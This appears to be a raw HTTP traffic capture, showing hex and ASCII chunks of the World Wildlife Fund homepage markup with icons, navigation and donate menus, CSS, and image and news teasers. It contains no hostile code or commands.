                                                                                                                                                    2023-09-05 11:01:21 UTC26INData Raw: 39 20 30 20 31 38 2e 34 2d 31 30 2e 31 20 31 38 2e 34 2d 31 38 2e 38 35 6c 2d 2e 30 32 2d 2e 38 36 63 31 2e 32 36 2d 2e 39 34 20 32 2e 33 36 2d 32 2e 31 20 33 2e 32 32 2d 33 2e 34 33 7a 22 20 66 69 6c 6c 3d 22 23 31 44 41 31 46 32 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 57 6f 72 6c 64 5f 57 69 6c 64 6c 69 66 65 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 53 6f 63 69 61 6c 20 4f 75 74 62 6f 75 6e 64 20 43 6c 69 63 6b 20 2d 20 46 6f 6f 74 65 72 7c 49 6e 73 74 61 67 72 61 6d 22 20 64 61 74 61 2d 73 6f 63 69 61 6c 2d 63 6f 6f 6b 69 65 3d 22 69
                                                                                                                                                    Data Ascii: 9 0 18.4-10.1 18.4-18.85l-.02-.86c1.26-.94 2.36-2.1 3.22-3.43z" fill="#1DA1F2"></path></svg></a></div><div><a href="https://instagram.com/World_Wildlife" data-track-event="Homepages Show|Social Outbound Click - Footer|Instagram" data-social-cookie="i
                                                                                                                                                    2023-09-05 11:01:21 UTC27INData Raw: 38 20 30 20 30 31 2d 32 2e 30 37 2d 31 2e 33 34 20 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 2d 31 2e 33 34 2d 32 2e 30 37 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 2d 2e 36 32 2d 33 2e 33 35 63 2d 2e 30 39 2d 31 2e 39 2d 2e 31 2d 32 2e 34 36 2d 2e 31 2d 37 2e 32 37 20 30 2d 34 2e 38 2e 30 31 2d 35 2e 33 38 2e 31 2d 37 2e 32 37 2e 30 38 2d 31 2e 37 36 2e 33 37 2d 32 2e 37 31 2e 36 32 2d 33 2e 33 35 2e 33 32 2d 2e 38 34 2e 37 31 2d 31 2e 34 34 20 31 2e 33 34 2d 32 2e 30 37 61 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 32 2e 30 37 2d 31 2e 33 34 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 33 2e 33 35 2d 2e 36 32 63 31 2e 39 2d 2e 30 39 20 32 2e 34 36 2d 2e 31 20 37 2e 32 37 2d 2e 31 7a 6d 30 20 35 2e 35 32 61 39 2e 32 34 20 39 2e 32 34 20 30 20 31 30 30
                                                                                                                                                    Data Ascii: 8 0 01-2.07-1.34 5.58 5.58 0 01-1.34-2.07 9.96 9.96 0 01-.62-3.35c-.09-1.9-.1-2.46-.1-7.27 0-4.8.01-5.38.1-7.27.08-1.76.37-2.71.62-3.35.32-.84.71-1.44 1.34-2.07a5.58 5.58 0 012.07-1.34 9.96 9.96 0 013.35-.62c1.9-.09 2.46-.1 7.27-.1zm0 5.52a9.24 9.24 0 100
                                                                                                                                                    2023-09-05 11:01:21 UTC28INData Raw: 20 30 31 2d 31 2e 33 34 2d 32 2e 30 37 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 2d 2e 36 32 2d 33 2e 33 35 63 2d 2e 30 39 2d 31 2e 39 2d 2e 31 2d 32 2e 34 36 2d 2e 31 2d 37 2e 32 37 20 30 2d 34 2e 38 2e 30 31 2d 35 2e 33 38 2e 31 2d 37 2e 32 37 2e 30 38 2d 31 2e 37 36 2e 33 37 2d 32 2e 37 31 2e 36 32 2d 33 2e 33 35 2e 33 32 2d 2e 38 34 2e 37 31 2d 31 2e 34 34 20 31 2e 33 34 2d 32 2e 30 37 61 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 32 2e 30 37 2d 31 2e 33 34 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 33 2e 33 35 2d 2e 36 32 63 31 2e 39 2d 2e 30 39 20 32 2e 34 36 2d 2e 31 20 37 2e 32 37 2d 2e 31 7a 6d 30 20 35 2e 35 32 61 39 2e 32 34 20 39 2e 32 34 20 30 20 31 30 30 20 31 38 2e 34 38 20 39 2e 32 34 20 39 2e 32 34 20 30 20 30 30 30 2d 31 38 2e 34 38
                                                                                                                                                    Data Ascii: 01-1.34-2.07 9.96 9.96 0 01-.62-3.35c-.09-1.9-.1-2.46-.1-7.27 0-4.8.01-5.38.1-7.27.08-1.76.37-2.71.62-3.35.32-.84.71-1.44 1.34-2.07a5.58 5.58 0 012.07-1.34 9.96 9.96 0 013.35-.62c1.9-.09 2.46-.1 7.27-.1zm0 5.52a9.24 9.24 0 100 18.48 9.24 9.24 0 000-18.48
                                                                                                                                                    2023-09-05 11:01:21 UTC30INData Raw: 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 2d 2e 36 32 2d 33 2e 33 35 63 2d 2e 30 39 2d 31 2e 39 2d 2e 31 2d 32 2e 34 36 2d 2e 31 2d 37 2e 32 37 20 30 2d 34 2e 38 2e 30 31 2d 35 2e 33 38 2e 31 2d 37 2e 32 37 2e 30 38 2d 31 2e 37 36 2e 33 37 2d 32 2e 37 31 2e 36 32 2d 33 2e 33 35 2e 33 32 2d 2e 38 34 2e 37 31 2d 31 2e 34 34 20 31 2e 33 34 2d 32 2e 30 37 61 35 2e 35 38 20 35 2e 35 38 20 30 20 30 31 32 2e 30 37 2d 31 2e 33 34 20 39 2e 39 36 20 39 2e 39 36 20 30 20 30 31 33 2e 33 35 2d 2e 36 32 63 31 2e 39 2d 2e 30 39 20 32 2e 34 36 2d 2e 31 20 37 2e 32 37 2d 2e 31 7a 6d 30 20 35 2e 35 32 61 39 2e 32 34 20 39 2e 32 34 20 30 20 31 30 30 20 31 38 2e 34 38 20 39 2e 32 34 20 39 2e 32 34 20 30 20 30 30 30 2d 31 38 2e 34 38 7a 4d 31 38 20 32 34 61 36 20 36 20 30
                                                                                                                                                    Data Ascii: 9.96 9.96 0 01-.62-3.35c-.09-1.9-.1-2.46-.1-7.27 0-4.8.01-5.38.1-7.27.08-1.76.37-2.71.62-3.35.32-.84.71-1.44 1.34-2.07a5.58 5.58 0 012.07-1.34 9.96 9.96 0 013.35-.62c1.9-.09 2.46-.1 7.27-.1zm0 5.52a9.24 9.24 0 100 18.48 9.24 9.24 0 000-18.48zM18 24a6 6 0
                                                                                                                                                    2023-09-05 11:01:21 UTC31INData Raw: 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e 20 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 34 2e 35 20 31 30 2e 35 68 32 37 76 31 35 68 2d 32 37 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 33 32 2e 30 35 20 36 2e 37 36 61 34 2e 35 36 20 34 2e 35 36 20 30 20 30 31 33 2e 32 20 33 2e 32 63 2e 37 35 20 32 2e 38 33 2e 37 35 20 38 2e 37 32 2e 37 35 20 38 2e 37 32 73 30 20 35 2e 39 2d 2e 37 34 20 38 2e 37 32 61 34 2e 35 32 20 34 2e 35 32 20 30 20 30 31 2d 33 2e 31 39 20 33 2e 32 63 2d 32 2e 38 32 2e 37 36 2d 31 34 2e
                                                                                                                                                    Data Ascii: "none" aria-hidden="true" class="svg-icon "><path fill="#fff" d="M4.5 10.5h27v15h-27z"></path><path fill-rule="evenodd" clip-rule="evenodd" d="M32.05 6.76a4.56 4.56 0 013.2 3.2c.75 2.83.75 8.72.75 8.72s0 5.9-.74 8.72a4.52 4.52 0 01-3.19 3.2c-2.82.76-14.
                                                                                                                                                    2023-09-05 11:01:21 UTC32INData Raw: 32 38 35 61 0d 0a 65 64 3d 22 66 61 6c 73 65 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 54 6f 67 67 6c 65 20 41 62 6f 75 74 20 75 73 20 44 72 6f 70 64 6f 77 6e 20 4c 69 6e 6b 73 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 74 69 74 6c 65 2d 67 72 6f 75 70 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 22 3e 54 6f 67 67 6c 65 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 41 62 6f 75 74 20 75 73 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 22 3e
                                                                                                                                                    Data Ascii: 285aed="false" data-track-event="Homepages Show|Upper Nav Click|Toggle About us Dropdown Links"><div class="nav-item-title-group"><div class="nav-item-title"><span class="screen-reader">Toggle</span><span>About us</span><span class="screen-reader">
                                                                                                                                                    2023-09-05 11:01:21 UTC34INData Raw: 2e 33 2e 33 39 2d 2e 36 35 2e 33 39 2d 31 2e 30 34 20 30 2d 2e 34 32 2d 2e 31 33 2d 2e 37 37 2d 2e 33 39 2d 31 2e 30 34 6c 2d 35 2e 32 37 2d 35 2e 35 33 63 2d 2e 32 36 2d 2e 33 2d 2e 36 2d 2e 34 35 2d 31 2d 2e 34 35 2d 2e 33 37 20 30 2d 2e 37 2e 31 35 2d 2e 39 35 2e 34 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 67 72 6f 75 70 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 67 72 6f 75 70 20 70 72 69 6d 61 72 79 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b
                                                                                                                                                    Data Ascii: .3.39-.65.39-1.04 0-.42-.13-.77-.39-1.04l-5.27-5.53c-.26-.3-.6-.45-1-.45-.37 0-.7.15-.95.45z"></path></svg></a> <div class="nav-group-wrapper"><div class="nav-group primary"><ul><li><a class="nav-link" data-track-event="Homepages Show|Upper Nav Click
                                                                                                                                                    2023-09-05 11:01:21 UTC35INData Raw: 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 6d 61 67 61 7a 69 6e 65 22 3e 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 4d 61 67 61 7a 69 6e 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 41 62 6f 75 74 20 75 73 20 2d 20 4e 65 77 73 72 6f 6f 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 61 62 6f 75 74 2f 6e 65 77 73 2d 70 72 65 73 73 22 3e 4e 65 77 73 72 6f 6f 6d 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 64 61 74 61 2d
                                                                                                                                                    Data Ascii: orldwildlife.org/magazine">World Wildlife Magazine</a></li><li><a class="nav-link" data-track-event="Homepages Show|Upper Nav Click|About us - Newsroom" href="https://www.worldwildlife.org/about/news-press">Newsroom</a></li><li><a class="nav-link" data-
                                                                                                                                                    2023-09-05 11:01:21 UTC36INData Raw: 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e 20 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 37 2e 38 32 20 31 36 2e 31 38 6c 2d 32 2e 34 32 2d 32 2e 34 31 63 2e 35 34 2d 2e 38 37 2e 38 2d 31 2e 37 38 2e 38 2d 32 2e 37 32 20 30 2d 31 2e 34 2d 2e 35 2d 32 2e 35 39 2d 31 2e 35 2d 33 2e 35 36 41 34 2e 38 37 20 34 2e 38 37 20 30 20 30 30 31 31 2e 31 32 20 36 63 2d 31 2e 34 32 20 30 2d 32 2e 36 34 2e 35 2d 33 2e 36 34 20 31 2e 34 39 41 34 2e 38 32 20 34 2e 38 32 20 30 20 30 30 36 20 31 31 2e 30 35 61 35 2e 30 33 20 35 2e 30 33 20 30 20 30 30 35 2e 31 32 20 35 2e 30 33 63 2e 39 33 20 30 20 31 2e 37 39 2d 2e 32 34 20 32 2e 35 37
                                                                                                                                                    Data Ascii: ox="0 0 24 24" fill="none" aria-hidden="true" class="svg-icon "><path d="M17.82 16.18l-2.42-2.41c.54-.87.8-1.78.8-2.72 0-1.4-.5-2.59-1.5-3.56A4.87 4.87 0 0011.12 6c-1.42 0-2.64.5-3.64 1.49A4.82 4.82 0 006 11.05a5.03 5.03 0 005.12 5.03c.93 0 1.79-.24 2.57
                                                                                                                                                    2023-09-05 11:01:21 UTC38INData Raw: 2e 38 37 20 34 2e 38 37 20 30 20 30 30 31 31 2e 31 32 20 36 63 2d 31 2e 34 32 20 30 2d 32 2e 36 34 2e 35 2d 33 2e 36 34 20 31 2e 34 39 41 34 2e 38 32 20 34 2e 38 32 20 30 20 30 30 36 20 31 31 2e 30 35 61 35 2e 30 33 20 35 2e 30 33 20 30 20 30 30 35 2e 31 32 20 35 2e 30 33 63 2e 39 33 20 30 20 31 2e 37 39 2d 2e 32 34 20 32 2e 35 37 2d 2e 37 32 6c 32 2e 35 20 32 2e 34 36 63 2e 32 33 2e 32 34 2e 35 2e 32 34 2e 37 37 20 30 6c 2e 38 36 2d 2e 38 37 63 2e 31 32 2d 2e 31 2e 31 38 2d 2e 32 33 2e 31 38 2d 2e 33 39 61 2e 34 38 2e 34 38 20 30 20 30 30 2d 2e 31 38 2d 2e 33 38 7a 6d 2d 39 2e 31 34 2d 32 2e 37 32 61 33 2e 32 36 20 33 2e 32 36 20 30 20 30 31 2d 31 2e 30 32 2d 32 2e 34 63 30 2d 2e 39 35 2e 33 34 2d 31 2e 37 35 20 31 2e 30 32 2d 32 2e 34 32 2e 36 37 2d 2e
                                                                                                                                                    Data Ascii: .87 4.87 0 0011.12 6c-1.42 0-2.64.5-3.64 1.49A4.82 4.82 0 006 11.05a5.03 5.03 0 005.12 5.03c.93 0 1.79-.24 2.57-.72l2.5 2.46c.23.24.5.24.77 0l.86-.87c.12-.1.18-.23.18-.39a.48.48 0 00-.18-.38zm-9.14-2.72a3.26 3.26 0 01-1.02-2.4c0-.95.34-1.75 1.02-2.42.67-.
                                                                                                                                                    2023-09-05 11:01:21 UTC39INData Raw: 3d 22 4d 32 2e 39 33 20 31 31 2e 30 37 68 31 38 2e 31 34 61 2e 39 33 2e 39 33 20 30 20 31 31 30 20 31 2e 38 36 48 32 2e 39 33 61 2e 39 33 2e 39 33 20 30 20 30 31 30 2d 31 2e 38 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 70 61 6e 65 6c 22 20 69 64 3d 22 61 63 74 69 6f 6e 2d 6e 61 76 2d 32 2d 70 61 6e 65 6c 2d 37 30 22 20 72 6f 6c 65 3d 22 72 65 67 69 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 44 6f 6e 61 74 65 22 20 68 69 64 64 65 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 69 6e 6e 65 72 20 6e 61 76 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 22 3e 0a 3c 75 6c
                                                                                                                                                    Data Ascii: ="M2.93 11.07h18.14a.93.93 0 110 1.86H2.93a.93.93 0 010-1.86z"></path></svg></button><div class="nav-item-accordion-panel" id="action-nav-2-panel-70" role="region" aria-label="Donate" hidden><div class="nav-item-accordion-inner nav-item-dropdown"><ul
                                                                                                                                                    2023-09-05 11:01:21 UTC40INData Raw: 73 70 61 6e 3e 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 44 6f 6e 61 74 65 20 2d 20 52 65 73 70 6f 6e 64 20 74 6f 20 6f 75 72 20 54 56 20 41 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 6f 74 65 63 74 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 70 61 67 65 2f 35 33 30 35 37 2f 64 6f 6e 61 74 65 2f 31 3f 65 6e 5f 6f 67 5f 73 6f 75 72 63 65 3d 57 65 62 5f 44 52 54 56 5f 54 69 67 65 72 26 61 6d 70 3b 65 61 2e 74 72 61 63 6b 69 6e 67 2e 69 64 3d 57 65 62 5f 54 6f 70 6e 61 76 26 61 6d 70 3b 73 75 70 70 6f 72 74 65 72 2e 61 70 70 65 61 6c 43 6f 64 65 3d 41 57 53 32 34 30 32
                                                                                                                                                    Data Ascii: span></a> </li><li><a data-track-event="Homepages Show|Upper Nav Click|Donate - Respond to our TV Ad" href="https://protect.worldwildlife.org/page/53057/donate/1?en_og_source=Web_DRTV_Tiger&amp;ea.tracking.id=Web_Topnav&amp;supporter.appealCode=AWS2402
                                                                                                                                                    2023-09-05 11:01:21 UTC42INData Raw: 6c 61 73 73 3d 22 73 76 67 2d 69 63 6f 6e 20 2d 63 6c 6f 73 65 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 2e 39 33 20 31 31 2e 30 37 68 31 38 2e 31 34 61 2e 39 33 2e 39 33 20 30 20 31 31 30 20 31 2e 38 36 48 32 2e 39 33 61 2e 39 33 2e 39 33 20 30 20 30 31 30 2d 31 2e 38 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e 2d 70 61 6e 65 6c 22 20 69 64 3d 22 61 63 74 69 6f 6e 2d 6e 61 76 2d 32 2d 70 61 6e 65 6c 2d 37 31 22 20 72 6f 6c 65 3d 22 72 65 67 69 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 64 6f 70 74 22 20 68 69 64 64 65 6e 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 2d 61 63 63 6f 72 64 69 6f 6e
                                                                                                                                                    Data Ascii: lass="svg-icon -close"><path d="M2.93 11.07h18.14a.93.93 0 110 1.86H2.93a.93.93 0 010-1.86z"></path></svg></button><div class="nav-item-accordion-panel" id="action-nav-2-panel-71" role="region" aria-label="Adopt" hidden><div class="nav-item-accordion
                                                                                                                                                    2023-09-05 11:01:21 UTC42INData Raw: 37 66 66 61 0d 0a 0a 3c 73 70 61 6e 3e 41 70 70 61 72 65 6c 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 61 20 64 61 74 61 2d 74 72 61 63 6b 2d 65 76 65 6e 74 3d 22 48 6f 6d 65 70 61 67 65 73 20 53 68 6f 77 7c 55 70 70 65 72 20 4e 61 76 20 43 6c 69 63 6b 7c 41 64 6f 70 74 20 2d 20 4d 6f 72 65 20 47 69 66 74 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 66 74 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 67 69 66 74 2d 63 65 6e 74 65 72 2f 67 69 66 74 73 2f 47 69 66 74 73 2d 61 6e 64 2d 41 63 63 65 73 73 6f 72 69 65 73 2e 61 73 70 78 3f 73 63 3d 41 57 59 32 32 30 39 4f 51 31 38 33 33 35 41 30 32 30 37 33 52 58 26 61 6d 70 3b 73 5f 73 75 62 73 72 63 3d 74 6f 70 6e 61 76 22 3e 0a 3c 73 70 61 6e 3e 4d 6f
                                                                                                                                                    Data Ascii: 7ffa<span>Apparel</span></a> </li><li><a data-track-event="Homepages Show|Upper Nav Click|Adopt - More Gifts" href="https://gifts.worldwildlife.org/gift-center/gifts/Gifts-and-Accessories.aspx?sc=AWY2209OQ18335A02073RX&amp;s_subsrc=topnav"><span>Mo
                                                                                                                                                    2023-09-05 11:01:21 UTC44INData Raw: 73 5f 49 6e 64 69 61 6e 5f 4f 63 65 61 6e 2f 34 32 35 78 31 37 30 5f 68 61 73 68 2f 32 6e 65 61 62 68 6b 39 7a 76 5f 5f 57 57 31 32 39 37 33 30 39 2e 6a 70 67 22 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 34 32 35 70 78 29 22 3e 0a 3c 69 6d 67 20 61 6c 74 3d 22 4f 6c 69 76 65 20 72 69 64 6c 65 79 20 74 75 72 74 6c 65 20 28 4c 65 70 69 64 6f 63 68 65 6c 79 73 20 6f 6c 69 76 61 63 65 61 29 20 68 61 74 63 68 6c 69 6e 67 73 20 77 61 6c 6b 69 6e 67 20 74 6f 77 61 72 64 73 20 73 65 61 20 61 74 20 73 75 6e 72 69 73 65 2e 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 69 6c 65 73 2e 77 6f 72 6c 64 77 69 6c 64 6c 69 66 65 2e 6f 72 67 2f 77 77 66 63 6d 73 70 72 6f 64 2f 69 6d 61 67 65 73 2f 53 65 61 5f
                                                                                                                                                    Data Ascii: s_Indian_Ocean/425x170_hash/2neabhk9zv__WW1297309.jpg" media="(min-width: 425px)"><img alt="Olive ridley turtle (Lepidochelys olivacea) hatchlings walking towards sea at sunrise." loading="lazy" src="https://files.worldwildlife.org/wwfcmsprod/images/Sea_
                                                                                                                                                    2023-09-05 11:01:21 UTC45INData Raw: 65 72 2d 68 6f 72 69 7a 2d 69 6e 20 77 79 73 69 77 79 67 20 6c 65 61 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 6e 31 32 22 3e 0a 3c 73 74 79 6c 65 3e 0a 2f 2a 72 65 6d 6f 76 65 20 74 65 78 74 75 72 65 20 66 72 6f 6d 20 68 65 72 6f 2a 2f 0a 2e 68 6f 6d 65 70 61 67 65 2d 69 6e 74 72 6f 3a 6e 6f 74 28 2e 2d 74 65 78 74 2d 69 6e 73 65 74 29 20 2e 68 6f 6d 65 70 61 67 65 2d 69 6e 74 72 6f 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 6d 61 73 6b 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 7d 0a 2f 2a 63 68 61
                                                                                                                                                    Data Ascii: er-horiz-in wysiwyg lead"><div class="span12"><style>/*remove texture from hero*/.homepage-intro:not(.-text-inset) .homepage-intro__content-wrapper { -webkit-mask-image: none; mask-image: none; padding-top: 10px; margin-top: 0;}/*cha
                                                                                                                                                    2023-09-05 11:01:21 UTC46INData Raw: 74 6f 6d 3a 32 30 70 78 3b 0a 7d 0a 2e 68 6f 6d 65 70 61 67 65 2d 67 6f 61 6c 73 5f 5f 64 65 73 63 72 69 70 74 69 6f 6e 7b 0a 63 6f 6c 6f 72 3a 23 30 30 30 3b 0a 7d 0a 73 65 63 74 69 6f 6e 3e 2e 68 6f 6d 65 70 61 67 65 2d 69 6d 70 61 63 74 7b 0a 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 0a 7d 0a 2e 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 2e 2d 74 69 74 6c 65 2d 6c 65 66 74 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 30 70 78 3b 0a 7d 0a 2e 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 2e 2d 74 69 74 6c 65 2d 6c 65 66 74 2e 2d 68 6f 6d 65 70 61 67 65 2d 74 65 78 74 75 72 65 2d 2d 62 65 69 67
                                                                                                                                                    Data Ascii: tom:20px;}.homepage-goals__description{color:#000;}section>.homepage-impact{padding-bottom:20px;}.homepage-lg-campaign-text.-title-left { padding-bottom: 10px;padding-top:120px;}.homepage-lg-campaign-text.-title-left.-homepage-texture--beig
                                                                                                                                                    2023-09-05 11:01:21 UTC48INData Raw: 61 69 67 6e 2d 74 65 78 74 5f 5f 69 6e 6e 65 72 22 3e 0a 3c 68 32 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 5f 5f 74 69 74 6c 65 22 3e 0a 4f 75 72 20 77 6f 72 6b 20 69 6e 20 61 63 74 69 6f 6e 0a 3c 2f 68 32 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6c 67 2d 63 61 6d 70 61 69 67 6e 2d 74 65 78 74 5f 5f 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 0a 44 69 73 63 6f 76 65 72 20 57 6f 72 6c 64 20 57 69 6c 64 6c 69 66 65 20 46 75 6e 64 20 6f 6e 20 74 68 65 20 67 72 6f 75 6e 64 2c 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 2c 20 6d 61 6b 69 6e 67 20 61 20 64 69 66 66 65 72 65 6e 63 65 20 66 6f 72 20 70 65 6f 70 6c 65 20 61 6e 64 20 74 68 65 20 70 6c 61 6e 65 74 2e 0a 3c 2f 70
                                                                                                                                                    Data Ascii: aign-text__inner"><h2 class="homepage-lg-campaign-text__title">Our work in action</h2><div class="homepage-lg-campaign-text__content"><p>Discover World Wildlife Fund on the ground, around the world, making a difference for people and the planet.</p
                                                                                                                                                    2023-09-05 11:01:21 UTC49INData Raw: 35 38 2e 6a 70 67 22 3e 0a 3c 2f 70 69 63 74 75 72 65 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 5f 5f 61 74 74 72 69 62 75 74 69 6f 6e 22 3e 53 68 75 74 74 65 72 73 74 6f 63 6b 20 2f 20 49 67 69 73 68 65 76 61 20 4d 61 72 69 61 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 73 65 63 6f 6e 64 61 72 79 5f 5f 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 33 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 6e 65 77 73 5f 5f 73 65 63 6f 6e 64 61 72 79 5f 5f 74 69 74 6c 65 22 3e 0a 52 65 75 73 69 6e 67 20 70 6c 61 73 74 69 63 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 6f 6d 65 70 61 67 65 2d 63 61 72 65 74 22 3e 26 23 36 35 32 37 39 3b 3c 2f 73 70 61 6e 3e 0a 3c 2f
                                                                                                                                                    Data Ascii: 58.jpg"></picture><span class="homepage__attribution">Shutterstock / Igisheva Maria</span></div><div class="homepage-news__secondary__content"><h3 class="homepage-news__secondary__title">Reusing plastic<span class="homepage-caret">&#65279;</span></
